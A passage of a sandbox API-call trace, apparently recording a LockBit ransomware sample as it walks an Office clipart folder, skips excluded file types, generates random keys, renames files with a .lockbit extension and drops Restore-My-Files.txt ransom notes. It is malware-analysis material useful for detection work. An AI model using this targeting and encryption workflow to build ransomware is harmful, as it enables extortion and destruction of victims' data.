ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3399f000, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x738, dwReserved0=0x0, dwReserved1=0x0, cFileName="TN00231_.WMF", cAlternateFileName="")) returned 1 [0179.292] lstrcmpiW (lpString1=".", lpString2="TN00231_.WMF") returned -1 [0179.292] lstrcmpiW (lpString1="..", lpString2="TN00231_.WMF") returned -1 [0179.292] PathFindExtensionW (pszPath="TN00231_.WMF") returned=".WMF" [0179.292] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.292] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.292] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.292] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.292] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.293] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.294] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.294] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.294] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.294] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.294] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.294] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.294] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.294] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.294] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.294] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.294] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.294] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.294] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.294] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.294] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.294] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.294] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.294] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.294] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.294] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TN00231_.WMF") returned -1 [0179.294] lstrcmpiW (lpString1="ntldr", lpString2="TN00231_.WMF") returned -1 [0179.294] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TN00231_.WMF") returned -1 [0179.294] lstrcmpiW (lpString1="bootsect.bak", lpString2="TN00231_.WMF") returned -1 [0179.295] lstrcmpiW (lpString1="autorun.inf", lpString2="TN00231_.WMF") returned -1 [0179.295] lstrcmpiW (lpString1="thumbs.db", lpString2="TN00231_.WMF") returned -1 [0179.295] lstrcmpiW (lpString1="iconcache.db", lpString2="TN00231_.WMF") returned -1 [0179.295] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.295] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00231_.WMF") returned=".WMF" [0179.295] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.295] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.295] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.295] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.295] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.295] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.295] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.295] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.295] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.295] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.295] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.295] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.295] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.295] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.295] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.295] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.295] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.296] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.296] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.296] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.296] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.296] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.296] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.296] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.296] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.296] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.296] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.296] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.296] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00231_.WMF.lockbit") returned 72 [0179.296] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00231_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00231_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0179.298] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.298] malloc (_Size=0x40068) returned 0x3df0008 [0179.298] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1848) returned 1 [0179.298] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.298] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0179.299] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.299] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0179.299] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0179.303] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00231_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00231_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.303] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.303] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.305] free (_Block=0x1fa2ed8) [0179.305] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00231_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.305] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.305] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.305] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65787a00, ftCreationTime.dwHighDateTime=0x1bd4b16, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x65787a00, ftLastWriteTime.dwHighDateTime=0x1bd4b16, nFileSizeHigh=0x0, nFileSizeLow=0xc68, dwReserved0=0x0, dwReserved1=0x0, cFileName="TN00234_.WMF", cAlternateFileName="")) returned 1 [0179.305] lstrcmpiW (lpString1=".", lpString2="TN00234_.WMF") returned -1 [0179.305] lstrcmpiW (lpString1="..", lpString2="TN00234_.WMF") returned -1 [0179.305] PathFindExtensionW (pszPath="TN00234_.WMF") returned=".WMF" [0179.305] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.305] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.305] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.305] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.305] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.305] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.305] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.305] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.305] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.306] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.306] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.306] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.306] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.306] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.306] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.306] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.306] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.306] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.306] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.306] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.306] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.306] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.306] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.306] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.306] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.306] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.306] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.306] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.307] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.307] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.307] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.307] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.307] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.307] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.307] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.307] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.307] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.307] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.307] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.307] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.307] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.307] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.307] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.307] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.307] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.307] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.307] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.307] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TN00234_.WMF") returned -1 [0179.308] lstrcmpiW (lpString1="ntldr", lpString2="TN00234_.WMF") returned -1 [0179.308] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TN00234_.WMF") returned -1 [0179.308] lstrcmpiW (lpString1="bootsect.bak", lpString2="TN00234_.WMF") returned -1 [0179.308] lstrcmpiW (lpString1="autorun.inf", lpString2="TN00234_.WMF") returned -1 [0179.308] lstrcmpiW (lpString1="thumbs.db", lpString2="TN00234_.WMF") returned -1 [0179.308] lstrcmpiW (lpString1="iconcache.db", lpString2="TN00234_.WMF") returned -1 [0179.308] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.308] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00234_.WMF") returned=".WMF" [0179.308] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.308] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.308] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.308] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.308] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.308] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.308] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.308] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.308] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.308] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.308] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.309] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.309] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.309] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.309] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.309] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.309] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.309] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.309] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.309] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.309] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.309] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.309] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.309] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.309] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.309] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.309] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.309] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.309] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00234_.WMF.lockbit") returned 72 [0179.309] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00234_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0179.315] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.315] malloc (_Size=0x40068) returned 0x3f70048 [0179.315] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=3176) returned 1 [0179.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.315] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0179.316] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.316] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0179.316] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0179.318] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00234_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00234_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.318] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.318] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.320] free (_Block=0x1fa2ed8) [0179.320] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00234_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.320] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.320] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.320] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa3d200, ftCreationTime.dwHighDateTime=0x1bd4b16, ftLastAccessTime.dwLowDateTime=0x6d4fb570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfa3d200, ftLastWriteTime.dwHighDateTime=0x1bd4b16, nFileSizeHigh=0x0, nFileSizeLow=0xf8c, dwReserved0=0x0, dwReserved1=0x0, cFileName="TN00241_.WMF", cAlternateFileName="")) returned 1 [0179.320] lstrcmpiW (lpString1=".", lpString2="TN00241_.WMF") returned -1 [0179.320] lstrcmpiW (lpString1="..", lpString2="TN00241_.WMF") returned -1 [0179.320] PathFindExtensionW (pszPath="TN00241_.WMF") returned=".WMF" [0179.320] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.320] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.320] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.320] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.320] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.320] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.320] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.321] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.321] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.321] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.321] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.321] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.321] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.321] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.321] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.321] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.321] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.321] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.321] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.321] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.321] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.321] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.321] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.321] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.321] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.321] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.321] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.321] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.321] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.322] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.322] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.322] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.322] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.322] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.322] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.322] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.322] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.322] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.322] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.322] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.322] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.322] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.322] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.322] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.322] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.322] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.322] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.322] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TN00241_.WMF") returned -1 [0179.322] lstrcmpiW (lpString1="ntldr", lpString2="TN00241_.WMF") returned -1 [0179.322] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TN00241_.WMF") returned -1 [0179.322] lstrcmpiW (lpString1="bootsect.bak", lpString2="TN00241_.WMF") returned -1 [0179.322] lstrcmpiW (lpString1="autorun.inf", lpString2="TN00241_.WMF") returned -1 [0179.323] lstrcmpiW (lpString1="thumbs.db", lpString2="TN00241_.WMF") returned -1 [0179.323] lstrcmpiW (lpString1="iconcache.db", lpString2="TN00241_.WMF") returned -1 [0179.323] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.323] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00241_.WMF") returned=".WMF" [0179.323] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.323] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.323] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.323] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.323] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.323] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.323] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.323] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.323] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.323] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.323] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.323] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.323] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.323] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.323] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.323] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.323] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.324] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.324] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.324] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.324] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.324] lstrcmpiW 